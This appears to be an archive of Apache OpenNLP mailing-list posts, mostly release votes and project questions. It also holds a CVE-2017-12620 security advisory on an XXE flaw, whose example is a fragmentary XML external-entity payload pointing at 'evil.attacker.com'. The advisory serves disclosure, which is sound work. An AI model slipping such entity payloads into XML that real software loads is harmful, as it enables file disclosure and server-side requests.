Re: [VOTE] Apache OpenNLP 2.0.0 Release Candidate

2022-06-01 Thread Joern Kottmann
+1 binding

Thanks for all the work on this Jeff!

Cheers,
Jörn


On Wed, Jun 1, 2022 at 9:57 PM Suneel Marthi  wrote:

> +1 binding
>
> On Wed, Jun 1, 2022 at 3:12 PM Jeff Zemerick  wrote:
>
> > Just pinging folks on the thread about the active vote. The project has a
> > board report due in a week - it would be awesome to get this release in
> > that report.
> >
> > Thanks,
> > Jeff
> >
> > On Thu, May 26, 2022 at 9:39 AM Jeff Zemerick 
> > wrote:
> >
> > > I created a JIRA task to update the NOTICE file.
> > >
> > > I re-ran build tests and eval tests and am +1 to release as 2.0.0
> > >
> > > Thanks,
> > > Jeff
> > >
> > >
> > > On Tue, May 10, 2022 at 8:37 AM Jeff Zemerick 
> > > wrote:
> > >
> > >> Bruno,
> > >>
> > >> Good catch. Does updating the date require a new RC?
> > >>
> > > >> Thanks for the reminder about the evaluation tests. Here's the output
> > > >> log from my run:
> > > >>
> > > >> https://gist.githubusercontent.com/jzonthemtn/02195c55a479c0c84102af0456331758/raw/a74aade3d605510f15c24098d13ebb9aa201c672/gistfile1.txt
> > >> (This was run on 1.9.5-SNAPSHOT before I did the release steps and the
> > >> version changed to 2.0.0.) I will also share how to run these tests.
> > >>
> > >> I am +1 for the release unless the NOTICE file is a blocker.
> > >>
> > >> Thanks,
> > >> Jeff
> > >>
> > >> On Mon, May 9, 2022 at 7:23 AM Bruno P. Kinoshita
> > >>  wrote:
> > >>
> > >>>  Hi Jeff,
> > >>> I think the NOTICE file needs to be adjusted to 2022?
> > >>>
> > >>>
> > >>>
> >
> https://github.com/apache/opennlp/blob/804ad5579b829f3a9b7b2bf3af819c53d6bb4290/NOTICE#L2https://github.com/apache/opennlp/blob/2.0.0/NOTICE#L2
> > >>>
> > >>> I downloaded a ZIP from Maven (opennlp-distr-2.0.0-bin.zip) and its
> > >>> NOTICE had 2017. At least in Apache Commons and Jena we try to keep
> the
> > >>> NOTICE file up to date (I think it's an ASF policy?)
> > >>>
> > >>> Building OK on
> > >>>
> > >>> Apache Maven 3.8.2 (ea98e05a04480131370aa0c110b8c54cf726c06f)
> > >>> Maven home: /opt/apache-maven-3.8.2
> > >>> Java version: 11.0.15, vendor: Private Build, runtime:
> > >>> /usr/lib/jvm/java-11-openjdk-amd64
> > >>> Default locale: en_US, platform encoding: UTF-8
> > > >>> OS name: "linux", version: "5.4.0-109-generic", arch: "amd64", family: "unix"
> > > >>>
> > > >>> I don't know how to run the more complete test/models that others used
> > > >>> to run for other releases. In case you know how to run that, it'd be good
> > > >>> if you could post in your vote saying whether everything worked fine.
> > > >>> Otherwise check with another PMC/committer about it. Since it's a 2.0
> > > >>> release I expect a few users curious about what's new trying out the new
> > > >>> code :)
> > >>>
> > >>> Thanks!
> > >>> Bruno
> > >>>
> > >>>
> > >>> On Monday, 9 May 2022, 12:26:50 am NZST, Jeff Zemerick <
> > >>> jzemer...@apache.org> wrote:
> > >>>
> > >>>  Hi folks,
> > >>>
> > >>> I have posted a first release candidate for the Apache OpenNLP 2.0.0
> > >>> release and it is ready for testing.
> > >>>
> > >>> The distributables can be downloaded from:
> > >>>
> > >>>
> >
> https://repository.apache.org/content/repositories/orgapacheopennlp-1029/org/apache/opennlp/opennlp-distr/2.0.0/
> > >>>
> > >>> The release was made from the Apache OpenNLP 2.0.0 tag at:
> > >>> https://github.com/apache/opennlp/tree/2.0.0
> > >>>
> > >>> To use it in a maven build set the version for opennlp-tools or
> > >>> opennlp-uima to 2.0.0 and add the following URL to your settings.xml
> > >>> file:
> > >>>
> > https://repository.apache.org/content/repositories/orgapacheopennlp-1029
> > >>>
> > >>> The release was made using the OpenNLP release process, documented on
> > the
> > >>> website:
> > >>> https://opennlp.apache.org/release.html
> > >>>
> > >>> Please vote on releasing these packages as Apache OpenNLP 2.0.0. The
> > vote
> > >>> is open for at least the next 72 hours.
> > >>>
> > >>> Only votes from OpenNLP PMC are binding, but everyone is welcome to
> > check
> > >>> the release candidate and vote. The vote passes if at least three
> > binding
> > >>> +1 votes are cast.
> > >>>
> > > >>> [ ] +1 Release the packages as Apache OpenNLP 2.0.0
> > >>> [ ] -1 Do not release the packages because...
> > >>>
> > >>> Thanks!
> > >>> Jeff
> > >>>
> > >>
> > >>
> >
>


Re: [VOTE] Apache OpenNLP 1.9.3 Release Candidate

2020-07-29 Thread Joern Kottmann
+1 Release the packages as Apache OpenNLP 1.9.3

Jörn

On Wed, Jul 29, 2020 at 1:08 PM Tommaso Teofili
 wrote:
>
> +1 from me, build, sigs, tag look good.
>
> Regards,
> Tommaso
>
> On Tue, 28 Jul 2020 at 10:48, Bruno P. Kinoshita  wrote:
>
> > It worked after I imported keys from
> > https://dist.apache.org/repos/dist/release/opennlp/KEYS
> >
> > [x] +1 Release the packages as Apache OpenNLP 1.9.3
> >
> >
> > Thanks!
> > Bruno
> >
> >
> > On Monday, 27 July 2020, 12:00:29 am NZST, Jeff Zemerick <
> > jzemer...@apache.org> wrote:
> >
> >
> >
> >
> >
> > Looks like I'm in there as jzemerick. See if I'm doing this correctly:
> >
> > wget https://people.apache.org/keys/group/opennlp.asc
> > gpg --import opennlp.asc
> >
> > wget https://repository.apache.org/content/repositories/orgapacheopennlp-1027/org/apache/opennlp/opennlp-distr/1.9.3/opennlp-distr-1.9.3-bin.tar.gz
> > wget https://repository.apache.org/content/repositories/orgapacheopennlp-1027/org/apache/opennlp/opennlp-distr/1.9.3/opennlp-distr-1.9.3-bin.tar.gz.asc
> >
> > gpg --verify opennlp-distr-1.9.3-bin.tar.gz.asc
> > gpg: assuming signed data in 'opennlp-distr-1.9.3-bin.tar.gz'
> > gpg: Signature made Fri Jul 24 15:21:24 2020 UTC
> > gpg:                using RSA key 6786BCFFBD2AE66E737FE97760E63AD841EF12D8
> > gpg: Good signature from "Jeff Zemerick (CODE SIGNING KEY) <jzemer...@apache.org>" [unknown]
> > gpg: WARNING: This key is not certified with a trusted signature!
> > gpg:          There is no indication that the signature belongs to the owner.
> > Primary key fingerprint: 6786 BCFF BD2A E66E 737F  E977 60E6 3AD8 41EF 12D8
> >
> > Jeff
> >
> >
> > On Sun, Jul 26, 2020 at 5:25 AM Bruno P. Kinoshita 
> > wrote:
> >
> > > Hi,
> > >
> > >
> > > Built successfully from tag with Java 8 on Ubuntu LTS. Had a look at one
> > > file from the dist area, and the contents looked OK (license, notice, jars
> > > were using the right version 1.9.3 too).
> > >
> > >
> > > Also checked the signatures using some shell script I normally use, but it
> > > failed to validate. I think it failed to find your key in
> > > https://people.apache.org/keys/group/opennlp.asc. Have you added your key
> > > there? I searched for Jeff and jzonthemtn, but couldn't find it.
> > >
> > >
> > > Cheers
> > >
> > > Bruno
> > >
> > >
> > >
> > > On Saturday, 25 July 2020, 11:08:12 pm NZST, Jeff Zemerick <
> > > jzemer...@apache.org> wrote:
> > >
> > >
> > >
> > >
> > >
> > > Hi folks,
> > >
> > > I have posted a 1st release candidate for the Apache OpenNLP 1.9.3 release
> > > and it is ready for testing.
> > >
> > > The distributables can be downloaded from:
> > >
> > > https://repository.apache.org/content/repositories/orgapacheopennlp-1027/org/apache/opennlp/opennlp-distr/1.9.3/
> > >
> > > The release was made from the Apache OpenNLP 1.9.3 tag at:
> > > https://github.com/apache/opennlp/tree/opennlp-1.9.3
> > >
> > > To use it in a maven build set the version for opennlp-tools or
> > > opennlp-uima to 1.9.3 and add the following URL to your settings.xml file:
> > > https://repository.apache.org/content/repositories/orgapacheopennlp-1027
> > >
> > > The release was made using the OpenNLP release process, documented on the
> > > website:
> > > https://opennlp.apache.org/release.html
> > >
> > > Please vote on releasing these packages as Apache OpenNLP 1.9.3. The vote
> > > is open for at least the next 72 hours.
> > >
> > > Only votes from OpenNLP PMC are binding, but everyone is welcome to check
> > > the release candidate and vote.
> > > The vote passes if at least three binding +1 votes are cast.
> > >
> > > [ ] +1 Release the packages as Apache OpenNLP 1.9.3
> > > [ ] -1 Do not release the packages because...
> > >
> > > Thanks!
> > >
> > > Jeff
> > >
> >


Re: license for opennlp 1.5 pre-trained models

2019-12-30 Thread Joern Kottmann
Hello,

The Apache OpenNLP project only distributes models that are licensed
under the Apache License 2.0, or models that comply with the strict
licensing requirements at Apache.
So far the only model released by the Apache OpenNLP project is a language
detection model.

The OpenNLP project was hosted in the past at SourceForge and back
then there was also a release of various pre-trained models, but the
license situation for these models is unclear to me.
The problem is that the models are derived from copyright protected
corpora, and depending on the source the license for the corpus has a
clause about derived works from it.
The project back then was under the LGPL license, and I would believe
the intention was to release the models under the same license
(copyright holders of the corpora never complained but certainly
wouldn't agree).

Today we can train models on UD (Universal Dependencies) and release them
under an open source license, but this hasn't been done yet due to lack of
contributions / time from the maintainers.

Jörn


On Mon, Dec 30, 2019 at 9:33 PM Andrej Shadura  wrote:
>
> Hi,
>
> There’s a bunch of pre-trained 1.5 models available for download at the
> OpenNLP website, but they lack licensing information. Someone reuploaded
> them as Java JAR files to MvnRepository stating they’re Apache-2.0
> licensed, but I’m not sure that’s correct.
>
> I’m concerned because LanguageTool depends on these models, and I’m
> packaging it for Debian, and I need license clarity, since Debian
> doesn’t accept non-free files or files with unclear licensing.
>
> Could somebody please clarify this?
>
> Thanks!
>
> References
>  [1]: http://opennlp.sourceforge.net/models-1.5/
>  [2]: https://mvnrepository.com/artifact/edu.washington.cs.knowitall
>
> --
> Cheers,
>   Andrej


Re: OpenNLP 1.9.2 and Java 8/11

2019-12-15 Thread Joern Kottmann
+1 lgtm, it would be nice to track down the exact cause of the changes
in accuracy caused by the JDK update.
We had similar issues in the past, e.g. through things like the
undefined iteration order of Sets.

I am happy to help with this.

Jörn

On Sat, Dec 14, 2019 at 3:48 PM Tommaso Teofili
 wrote:
>
> +1
>
> Thanks Jeff!
>
> On Sat, 14 Dec 2019 at 15:32, Jeff Zemerick wrote:
>
> > During preparation for a 1.9.2 release it was noticed that the current
> > master branch fails a few of the regression tests when built using OpenJDK
> > 11. (All tests pass when using OpenJDK 8.) Unless there are any significant
> > objections, the 1.9.2 release will be built using OpenJDK 8, and the task
> > [1] covering the failing regression tests on OpenJDK 11 will be addressed
> > in the next minor release.
> >
> > Thanks,
> > Jeff
> >
> > [1] https://issues.apache.org/jira/browse/OPENNLP-1285
> >
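
The remark above about the undefined iteration order of Sets can be illustrated with a small sketch. This is not OpenNLP code; the class FeatureIndexer and its methods are hypothetical names chosen for illustration. It assumes a trainer that assigns integer indices to feature names in iteration order, which makes the result depend on the Set implementation unless the features are sorted first.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.Set;
import java.util.TreeSet;

// Hypothetical helper, not part of OpenNLP: assigns an integer index to each feature name.
final class FeatureIndexer {

    // Index assignment follows the iteration order of the given set.
    // For a HashSet that order is unspecified and may differ between JDK versions.
    static Map<String, Integer> index(Set<String> features) {
        Map<String, Integer> indices = new LinkedHashMap<>();
        for (String feature : features) {
            indices.put(feature, indices.size());
        }
        return indices;
    }

    // Copying into a TreeSet sorts the features, so the assignment is the same on every JDK.
    static Map<String, Integer> stableIndex(Set<String> features) {
        return index(new TreeSet<>(features));
    }
}
```

Whether this is what caused the OpenJDK 11 differences tracked in OPENNLP-1285 is not established in this thread; the sketch only shows the class of problem being referred to.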


Re: KStem support?

2019-02-19 Thread Joern Kottmann
Hello,

we don't have it, but it would be nice to get a contribution for it.

Jörn

On Thu, Feb 7, 2019 at 3:03 PM Benedict Holland
 wrote:
>
> Hello all,
>
> I just happened to read a Solr message about using KStem. Is there any
> support for this particular stemmer or would you like there to be?
>
> Thanks,
> ~Ben


Re: [VOTE] Apache OpenNLP 1.9.0 Release Candidate 2

2018-06-29 Thread Joern Kottmann
+1

Jörn

On Fri, Jun 29, 2018 at 1:45 PM, Jeff Zemerick  wrote:
> Hi folks,
>
> I have posted a 2nd release candidate for the Apache OpenNLP 1.9.0 release
> and it is ready for testing.
>
> The distributables can be downloaded from:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1022/org/apache/opennlp/opennlp-distr/1.9.0/
>
> The release was made from the Apache OpenNLP 1.9.0 RC2 tag at:
> https://github.com/apache/opennlp/tree/opennlp-1.9.0-rc2
>
> To use it in a maven build set the version for opennlp-tools or
> opennlp-uima to 1.9.0 and add the following URL to your settings.xml file:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1022
>
> The release was made using the OpenNLP release process, documented on the
> website:
> https://opennlp.apache.org/release.html
>
> Please vote on releasing these packages as Apache OpenNLP 1.9.0. The vote
> is open for at least the next 72 hours.
>
> Only votes from OpenNLP PMC are binding, but everyone is welcome to check
> the release candidate and vote.
> The vote passes if at least three binding +1 votes are cast.
>
> [ ] +1 Release the packages as Apache OpenNLP 1.9.0
> [ ] -1 Do not release the packages because...
>
> Thanks!
> Jeff


Re: Custom models (for Ukrainian and Russian languages)

2018-06-28 Thread Joern Kottmann
Hello,

we would be happy to hear about your experience. Did the language
detector perform well enough on Russian/Ukrainian texts?

To reproduce the models we train you should download the data via svn:
svn co https://svn.apache.org/repos/bigdata/opennlp/trunk opennlp-corpus

Note the corpus is quite large and it contains instructions on how to
train on it.

HTH,
Jörn


On Sat, Jun 23, 2018 at 4:59 PM, Anton Matsiuk  wrote:
> Hi!
> I am reaching out to get or build some custom models for the Ukrainian
> and Russian languages.
> We have tried the Language Detector model and, with future customisation,
> we think that it is AWESOME.
> Thank you for what you're doing.
>
> Am I writing to the right addressee?
> Maybe I should get in touch with Leipzig personnel?
> Here: http://wortschatz.uni-leipzig.de/en/contact
> or here: http://asv.informatik.uni-leipzig.de/de/staff
>
> Thank you again.
> Waiting for an answer from you.


Re: OPENNLP-912 : Add a rule based sentence detector

2018-04-06 Thread Joern Kottmann
Hello,

could you elaborate a bit on the approach?

Jörn

On Tue, Apr 3, 2018 at 5:24 PM, Isuranga Perera
 wrote:
> Hi All,
>
> I would like to contribute $subject feature. Appreciate if anyone can guide
> me through the process.
>
> Best Regards
> Isuranga Perera


Re: [VOTE] Apache OpenNLP 1.8.4 Release Candidate

2017-12-23 Thread Joern Kottmann
+1

Jörn

On Dec 21, 2017 15:44, "Jeff Zemerick"  wrote:

> Hi Folks,
>
> I have posted a first release candidate for the Apache OpenNLP 1.8.4
> release and it is ready for testing.
>
> The RC1 distributables can be downloaded from here:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1020/org/apache/opennlp/opennlp-distr/1.8.4
>
> The release was made from the Apache OpenNLP 1.8.4 tag at
> https://github.com/apache/opennlp/tree/opennlp-1.8.4
>
> To use it in a maven build set the version for opennlp-tools or
> opennlp-uima to 1.8.4 and add the following URL to your settings.xml file:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1020
>
> The release was made using the OpenNLP release process, documented on the
> Wiki here:
> https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>
> The release contains quite a few changes; please refer to the contained
> issue list for details.
>
> Please vote on releasing these packages as Apache OpenNLP 1.8.4. The vote
> is open for at least the next 72 hours.
>
> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
> release candidate and voice their approval or disapproval. The vote passes
> if at least three binding +1 votes are cast.
>
> [ ] +1 Release the packages as Apache OpenNLP 1.8.4
> [ ] -1 Do not release the packages because...
>
> Thanks!
> Jeff Zemerick
>


Re: [VOTE] Language Detector model for Apache OpenNLP 1.8.3 Release Candidate 3

2017-10-30 Thread Joern Kottmann
+1

Jörn

On Mon, Oct 30, 2017 at 2:30 PM, William Colen  wrote:
> The Apache OpenNLP PMC would like to call for a Vote on the Language
> Detector model for Apache OpenNLP 1.8.3 Release Candidate 3.
>
> The Release artifacts can be downloaded from:
>
> http://people.apache.org/~colen/models/langdetect-183/rc3/
>
> The model was built with Apache OpenNLP 1.8.3 release, trained with a
> portion of the Leipzig corpus, which can be found under this  tag:
>
> https://svn.apache.org/repos/bigdata/opennlp/tags/langdetect-183_RC3
>
> The model binary includes the NOTICE, LICENSE and also a README with
> details of supported languages, how the Leipzig corpus was created and the
> model was trained. For your convenience the README is available here:
>
> https://svn.apache.org/repos/bigdata/opennlp/tags/langdetect-183_RC3/leipzig/resources/README.txt
>
> A detailed evaluation report is available here:
>
> http://people.apache.org/~colen/models/langdetect-183/rc3/langdetect-183.bin.report.txt
>
> To use Language Detector, please follow the documentation here:
>
> http://opennlp.apache.org/docs/1.8.3/manual/opennlp.html#tools.langdetect
>
> It is important to note that this model is trained for and works well with
> longer texts that have at least two sentences from the same language.
>
> The artifacts have been signed with the Key - 524A9649 found at
>
> http://people.apache.org/keys/group/opennlp.asc
>
> Please vote on releasing the model as Apache OpenNLP Language Detector
> Model 1.8.3. The vote is open for either the next 72 hours or a minimum of
> 3 +1 PMC binding votes, whichever happens earlier.
>
> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
> release candidate and voice their approval or disapproval. The vote passes
> if at least three binding +1 votes are cast.
>
> [ ] +1 Release the packages as Apache OpenNLP Language Detector Model 1.8.3
>
> [ ] -1 Do not release the packages because...
>
> Thanks again to all the committers and contributors for their work over the
> past few weeks.


Re: [VOTE] Apache OpenNLP 1.8.3 Release Candidate

2017-10-26 Thread Joern Kottmann
+1

Jörn

On Thu, Oct 26, 2017 at 10:18 AM, Rodrigo Agerri  wrote:
> +1 (binding)
>
> -eval and unit tests OK
>
> On Wed, Oct 25, 2017 at 7:01 PM, William Colen  
> wrote:
>> +1 binding
>>
>> - eval tests ok
>> - unit test ok
>> - build from tag ok
>> - distribution execution ok
>> - distribution ok
>>
>>
>>
>> 2017-10-25 14:46 GMT-02:00 Tommaso Teofili :
>>
>>> +1 (binding)
>>>
>>> - source build from tag ok
>>> - sigs and checks ok
>>>
>>> On Wed, 25 Oct 2017 at 18:09, Steve Blackmon <
>>> sblack...@apache.org> wrote:
>>>
>>> >  +1 non-binding
>>> >
>>> > - source builds, tests pass
>>> > - verified checksums and signatures
>>> >
>>> > Steve Blackmon
>>> > sblack...@apache.org
>>> >
>>> > On Oct 25, 2017 at 10:17 AM, Dan Russ  wrote:
>>> >
>>> >
>>> > +1 burrito
>>> >
>>> > Ran unit tests on my downstream code that uses opennlp-tools.
>>> >
>>> > On Oct 25, 2017, at 6:58 AM, Suneel Marthi  wrote:
>>> >
>>> > +1 binding
>>> >
>>> > 1. Verified Sigs and hashes
>>> > 2. Ran a clean build from {src} * {zip, tar}
>>> > 3. All unit tests pass
>>> >
>>> > On Wed, Oct 25, 2017 at 3:08 PM, Bruno P. Kinoshita <
>>> > brunodepau...@yahoo.com.br.invalid> wrote:
>>> >
>>> > [ X ] +1 Release the packages as Apache OpenNLP 1.8.3
>>> >
>>> > `mvn clean test install` working fine, checked artefacts signatures,
>>> > matching with what was in the vote e-mail.
>>> >
>>> > Currently on tag 1.8.3, commit b317159cb9857dc509c08a31a98dc61209f39bff
>>> >
>>> > Thanks for preparing this release.
>>> >
>>> > Cheers
>>> > Bruno
>>> >
>>> >
>>> >
>>> > 
>>> > From: Suneel Marthi 
>>> > To: dev@opennlp.apache.org; us...@opennlp.apache.org
>>> > Sent: Tuesday, 24 October 2017 10:29 PM
>>> > Subject: [VOTE] Apache OpenNLP 1.8.3 Release Candidate
>>> >
>>> >
>>> >
>>> > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
>>> > 1.8.3 Release Candidate.
>>> >
>>> > The Release artifacts can be downloaded from:
>>> >
>>> > https://repository.apache.org/content/repositories/orgapacheopennlp-1010/org/apache/opennlp/opennlp-distr/1.7.2/
>>> >
>>> > The release was made from the Apache OpenNLP 1.8.3 tag at
>>> >
>>> > https://github.com/apache/opennlp/tree/opennlp-1.8.3
>>> >
>>> > To use it in a maven build set the version for opennlp-tools or
>>> > opennlp-uima to 1.8.3
>>> >
>>> > and add the following URL to your settings.xml file:
>>> >
>>> > https://repository.apache.org/content/repositories/orgapacheopennlp-1019/org/apache/opennlp/opennlp-distr/1.8.3/
>>> >
>>> > The artifacts have been signed with the Key - D3541808 found at
>>> >
>>> > http://people.apache.org/keys/group/opennlp.asc
>>> >
>>> > Please vote on releasing these packages as Apache OpenNLP 1.8.3. The vote
>>> > is open for either the next 72 hours or a minimum of 3 +1 PMC binding votes
>>> > whichever happens earlier.
>>> >
>>> > Only votes from OpenNLP PMC are binding, but folks are welcome to check the
>>> > release candidate and voice their approval or disapproval. The vote passes
>>> > if at least three binding +1 votes are cast.
>>> >
>>> > [ ] +1 Release the packages as Apache OpenNLP 1.8.3
>>> >
>>> > [ ] -1 Do not release the packages because...
>>> >
>>> > Thanks again to all the committers and contributors for their work
>>> > over the past few weeks.
>>> >
>>>
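
The pass rule quoted in these vote e-mails (at least three binding +1 votes, where only PMC votes are binding) can be sketched as a small tally. The class ReleaseVote and its Ballot type are hypothetical and not an ASF or OpenNLP tool. The sketch implements only the threshold stated in the e-mails; any further rules, such as how -1 votes are weighed, are not modelled.

```java
import java.util.List;

// Hypothetical model of a vote on a release candidate; not an ASF tool.
final class ReleaseVote {

    // Threshold stated in the vote e-mails.
    static final int REQUIRED_BINDING_PLUS_ONES = 3;

    // One cast vote: value is +1 or -1, binding is true for PMC members.
    static final class Ballot {
        final String voter;
        final int value;
        final boolean binding;

        Ballot(String voter, int value, boolean binding) {
            this.voter = voter;
            this.value = value;
            this.binding = binding;
        }
    }

    // Counts binding +1 votes and compares them with the threshold.
    // Non-binding votes are ignored by the count.
    static boolean passes(List<Ballot> ballots) {
        long bindingPlusOnes = ballots.stream()
                .filter(b -> b.binding && b.value == 1)
                .count();
        return bindingPlusOnes >= REQUIRED_BINDING_PLUS_ONES;
    }
}
```

Applied to a thread like the one above, non-binding +1 votes are welcome as feedback but do not move the count towards the threshold.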


[ANNOUNCE] CVE-2017-12620: Apache OpenNLP XXE vulnerability

2017-10-02 Thread Joern Kottmann
Severity: Medium


Vendor:
The Apache Software Foundation


Versions Affected:
OpenNLP 1.5.0 to 1.5.3
OpenNLP 1.6.0
OpenNLP 1.7.0 to 1.7.2
OpenNLP 1.8.0 to 1.8.1


Description:
When loading models or dictionaries that contain XML it is possible to
perform an XXE attack. Since OpenNLP is a library, this only affects
applications that load models or dictionaries from untrusted sources.



Mitigation:
All users who load models or XML dictionaries from untrusted sources
should update to 1.8.2.


Example:

An attacker can place this:


http://evil.attacker.com/;>
]>


Inside one of the XML files, either a dictionary or embedded inside a
model package, to demonstrate this vulnerability.
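
For readers who parse XML from untrusted sources in their own code, the following is a minimal sketch of one common way to configure a JAXP parser so that documents carrying a DOCTYPE (and therefore any external entity declaration) are rejected. The announcement does not describe how the fix in 1.8.2 was implemented, so this is not presented as the OpenNLP change; the class name SafeXml is hypothetical.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Illustrative only: a JAXP parser configured to refuse DOCTYPE declarations.
// This is not the code of the OpenNLP fix.
final class SafeXml {

    static DocumentBuilder newHardenedBuilder() throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Xerces feature, also supported by the JDK's built-in parser:
        // any DOCTYPE declaration becomes a fatal parse error.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory.newDocumentBuilder();
    }

    // Parses the given XML text with the hardened builder.
    static Document parse(String xml) throws Exception {
        return newHardenedBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }
}
```

With this configuration a plain dictionary document still parses, while a document that declares an external entity fails with a SAXException before any entity is resolved.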


Credit:
This issue was discovered by Nishil Shah of Salesforce.


Regards,
Jörn Kottmann


Re: [VOTE] Apache OpenNLP 1.8.2 Release Candidate 2

2017-09-15 Thread Joern Kottmann
The vote passed, only +1 votes were received.

The following voted +1:
Tommaso Teofili
Suneel Marthi
Jörn Kottmann
Daniel Russ
Jeff Zemerick
Richard Eckart de Castilho
William Colen
Peter Thygesen

Thanks for voting!

Jörn

On Wed, Sep 13, 2017 at 8:31 PM, Peter Thygesen
<peter.thyge...@gmail.com> wrote:
> Vote: +1 binding
>
>
>> On 11 Sep 2017, at 09.12, Joern Kottmann <kottm...@gmail.com> wrote:
>>
>> Hi Folks,
>>
>>
>> I have posted a second release candidate for the Apache OpenNLP 1.8.2
>> release and it is ready for testing.
>>
>>
>> The RC 2 distributables can be downloaded from here:
>> https://repository.apache.org/content/repositories/orgapacheopennlp-1018/org/apache/opennlp/opennlp-distr/1.8.2/
>>
>>
>> The release was made from the Apache OpenNLP 1.8.2 tag at
>> https://github.com/apache/opennlp/tree/opennlp-1.8.2
>>
>>
>> To use it in a maven build set the version for opennlp-tools or
>> opennlp-uima to 1.8.2 and add the following URL to your settings.xml
>> file:
>> https://repository.apache.org/content/repositories/orgapacheopennlp-1018
>>
>> The release was made using the OpenNLP release process, documented on
>> the Wiki here:
>> https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>>
>> The release contains quite a few changes; please refer to the contained
>> issue list for details.
>>
>>
>> Please vote on releasing these packages as Apache OpenNLP 1.8.2. The vote is
>> open for at least the next 72 hours.
>>
>>
>> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
>> release candidate and voice their approval or disapproval. The vote passes
>> if at least three binding +1 votes are cast.
>>
>>
>> [ ] +1 Release the packages as Apache OpenNLP 1.8.2
>> [ ] -1 Do not release the packages because...
>>
>>
>> Thanks!
>>
>> Jörn
>>
>> P.S. Here is my +1.
>


[VOTE] Apache OpenNLP 1.8.2 Release Candidate 2

2017-09-11 Thread Joern Kottmann
Hi Folks,


I have posted a second release candidate for the Apache OpenNLP 1.8.2
release and it is ready for testing.


The RC 2 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-1018/org/apache/opennlp/opennlp-distr/1.8.2/


The release was made from the Apache OpenNLP 1.8.2 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.2


To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.2 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-1018

The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process

The release contains quite a few changes; please refer to the contained
issue list for details.


Please vote on releasing these packages as Apache OpenNLP 1.8.2. The vote is
open for at least the next 72 hours.


Only votes from OpenNLP PMC are binding, but folks are welcome to check the
release candidate and voice their approval or disapproval. The vote passes
if at least three binding +1 votes are cast.


[ ] +1 Release the packages as Apache OpenNLP 1.8.2
[ ] -1 Do not release the packages because...


Thanks!

Jörn

P.S. Here is my +1.


Re: [VOTE] Apache OpenNLP 1.8.2 Release Candidate

2017-09-07 Thread Joern Kottmann
I am canceling the vote. The SourceForgeEval test is not running due
to an incorrect checksum for the training data.
Let's fix this and create one more RC.

Jörn

On Wed, Sep 6, 2017 at 8:38 PM, Jeff Zemerick <jzemer...@apache.org> wrote:
> +1 binding
>
> Built from tag.
> Ran the eval tests.
>
> On Wed, Sep 6, 2017 at 2:17 PM, Madhawa Kasun Gunasekara <
> madhaw...@gmail.com> wrote:
>
>> +1 (non-binding)
>>
>> Madhawa
>>
>> On Wed, Sep 6, 2017 at 1:15 PM, Peter Thygesen <peter.thyge...@gmail.com>
>> wrote:
>>
>> > +1 binding
>> >
>> > /Peter Thygesen
>> >
>> > > On 4 Sep 2017, at 23.41, Joern Kottmann <jo...@apache.org> wrote:
>> > >
>> > > Hi Folks,
>> > >
>> > >
>> > > I have posted a first release candidate for the Apache OpenNLP 1.8.2
>> > > release and it is ready for testing.
>> > >
>> > >
>> > > The RC 1 distributables can be downloaded from here:
>> > > https://repository.apache.org/content/repositories/orgapacheopennlp-1017/org/apache/opennlp/opennlp-distr/1.8.2/
>> > >
>> > >
>> > > The release was made from the Apache OpenNLP 1.8.2 tag at
>> > > https://github.com/apache/opennlp/tree/opennlp-1.8.2
>> > >
>> > >
>> > > To use it in a maven build set the version for opennlp-tools or
>> > > opennlp-uima to 1.8.2 and add the following URL to your settings.xml
>> > > file:
>> > > https://repository.apache.org/content/repositories/orgapacheopennlp-1017
>> > >
>> > > The release was made using the OpenNLP release process, documented on
>> > > the Wiki here:
>> > > https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>> > >
>> > > The release contains quite a few changes; please refer to the contained
>> > > issue list for details.
>> > >
>> > >
>> > > Please vote on releasing these packages as Apache OpenNLP 1.8.2. The vote is
>> > > open for at least the next 72 hours.
>> > >
>> > >
>> > > Only votes from OpenNLP PMC are binding, but folks are welcome to check the
>> > > release candidate and voice their approval or disapproval. The vote passes
>> > > if at least three binding +1 votes are cast.
>> > >
>> > >
>> > > [ ] +1 Release the packages as Apache OpenNLP 1.8.2
>> > > [ ] -1 Do not release the packages because...
>> > >
>> > >
>> > > Thanks!
>> > >
>> > > Jörn
>> > >
>> > > P.S. Here is my +1.
>> >
>> >
>>
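
The cancellation above was triggered by a checksum mismatch on the training data. As a rough illustration of that kind of guard, the sketch below hashes a file and compares the result with an expected hex digest. The thread does not say which hash algorithm the eval tests use, so the algorithm is a parameter here, and the class name ChecksumCheck is hypothetical rather than taken from the OpenNLP test code.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Hypothetical helper, not from the OpenNLP eval tests.
final class ChecksumCheck {

    // Streams the file through the digest and returns the lowercase hex string.
    static String hexDigest(Path file, String algorithm)
            throws IOException, NoSuchAlgorithmException {
        MessageDigest digest = MessageDigest.getInstance(algorithm);
        try (InputStream in = Files.newInputStream(file)) {
            byte[] buffer = new byte[8192];
            int read;
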